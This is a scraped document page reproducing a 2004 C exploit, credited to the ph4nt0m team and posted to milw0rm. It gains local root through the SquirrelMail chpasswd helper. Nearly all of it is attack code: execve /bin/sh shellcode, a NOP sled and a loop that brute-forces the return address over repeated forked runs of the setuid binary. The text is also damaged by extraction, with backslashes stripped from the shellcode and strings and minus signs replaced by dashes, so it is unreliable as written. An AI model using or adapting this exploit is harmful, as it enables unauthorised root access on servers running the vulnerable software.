SquirrelMail chpasswd Local Root Bruteforce Exploit by h3m4n

VIEWS: 135 PAGES: 3

									                               SquirrelMail chpasswd Local Root Bruteforce Exploit              Page 1/3
  1     /*
  2
  3     **   PST_chpasswd_exp−v_b.c:
  4     **
  5     **   Squirrelmail chpasswd local root bruteforce exploit
  6     **   Author:
  7     **   Bytes<Bytes[at]ph4nt0m.net> || <Bytes[at]ph4nt0m.org>
  8     **   www ph4nt0m net
  9     **   Notice:
  10    **   v_b: Local bruteforce version
  11    **   v_R: remote bruteforce version
  12    **
  13    **
  14    **   Greatze: #ph4nt0m,#music@0x557
  15    **   All PST member,Grip2,Airsupply,Jambalaya,Ann,Paul,Happy...
  16    **   Thax: My GF(Luz),Oyxin,Winewind,Envymask,Eong,luoluo,GoGo(f0r ever)...
  17    **
  18    **
  19    **   −=−=−=−=−=−=−=−=−=−= !!![+PH4NT0M TEAM PRIVATE EXPLOIT+]!!! =−=−=−=−=−=−=−=−=−=−
  20    **
  21    **   Date: 2004−04 # DO NOT DISTRIBUTE #
  22    **
  23    **   You Must get account belong to Webmaster ,www or other webserver groups.
  24    **
  25    */
  26
  27    #include   <stdio.h>
  28    #include   <unistd.h>
  29    #include   <stdlib.h>
  30    #include   <sys/wait.h>
  31
  32    #define NOP 0x90
  33    #define Fuckpr0 "./chpasswd" /* you need modify it by yourself */
  34    #define LOOP 2000 /* loop of bruteforce */
  35
  36    /* setuid(0) shellcode by by Matias Sedalo 3x ^_^ */
  37
  38    char shellcode[] ="x31xdbx53x8dx43x17xcdx80x99x68x6ex2fx73x68x68"
  39    "x2fx2fx62x69x89xe3x50x53x89xe1xb0x0bxcdx80";
  40
  41    unsigned long get_esp() {
  42
  43    __asm__ ("movl %esp,%eax");
  44
  45    }
  46
  47    void *M_malloc(size_t size){
  48
  49    register void *value;
  50
  51    value = malloc(size);
  52

Bytes                                                                                           08/25/2004
                                   SquirrelMail chpasswd Local Root Bruteforce Exploit     Page 2/3
  53    if(value == NULL){
  54
  55    printf("ERROR:virtual memory exhausted...n");
  56
  57    exit(−1);
  58
  59    }
  60
  61    return value;
  62
  63    }
  64
  65    int main(void){
  66
  67    unsigned long ret_addr;
  68
  69    int i,j=0,offset=2,status;
  70
  71    char *buf1,*buf2;
  72
  73    pid_t pid;
  74
  75    ret_addr = get_esp() − strlen(Fuckpr0) − strlen(shellcode);
  76
  77    printf("t−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−n");
  78    printf("t Squirrelmail chpasswd local root bruteforce exploit n");
  79    printf("t code By Bytes<Bytes[at]ph4nt0m.org> 2004 n");
  80    printf("t http://www.ph4nt0m.net n");
  81    printf("t#######################################################n");
  82
  83
  84    sleep(1);
  85
  86    printf("[+] Bruteforce......nn");
  87
  88    sleep(2);
  89
  90    buf1 = (char *)M_malloc(150);
  91
  92    buf2 = (char *)M_malloc(600);
  93
  94    while(j <= LOOP){
  95
  96    if((pid = fork()) == 0){
  97
  98    memset(buf2,0x90,sizeof(buf2) − strlen(shellcode) − 8);
  99
  100   memcpy(buf2 + sizeof(buf2) − strlen(shellcode) − 8,shellcode,sizeof(shellcode));
  101
  102   for(i=0; i < 150; i+=4){
  103
  104   *((unsigned long *)(buf1+i)) = ret_addr;
Bytes                                                                                      08/25/2004
                                SquirrelMail chpasswd Local Root Bruteforce Exploit   Page 3/3
  105
  106   }
  107
  108   printf("buf1 = %sn",buf1);
  109
  110   execl(Fuckpr0,"chpasswd",buf1,buf2,0);
  111
  112   }
  113
  114   wait(&status);
  115
  116   printf("[−] Signal: #%in", status);
  117
  118   if(WIFEXITED(status) != 0 ) {
  119
  120   printf("[=] Step.%i: 0x%xn[~] Exiting...n",(j/2),ret_addr);
  121
  122   exit(1);
  123
  124   }else{
  125
  126   ret_addr += offset;
  127
  128   j += offset;
  129
  130   printf("[=] Offset:%d Use ret:0x%xn",j, ret_addr);
  131
  132   }
  133
  134   }
  135
  136   free(buf1);
  137
  138   free(buf2);
  139
  140   return 1;
  141
  142   }
  143
  144   // milw0rm.com [2004−08−25]




Bytes                                                                                 08/25/2004

								
To top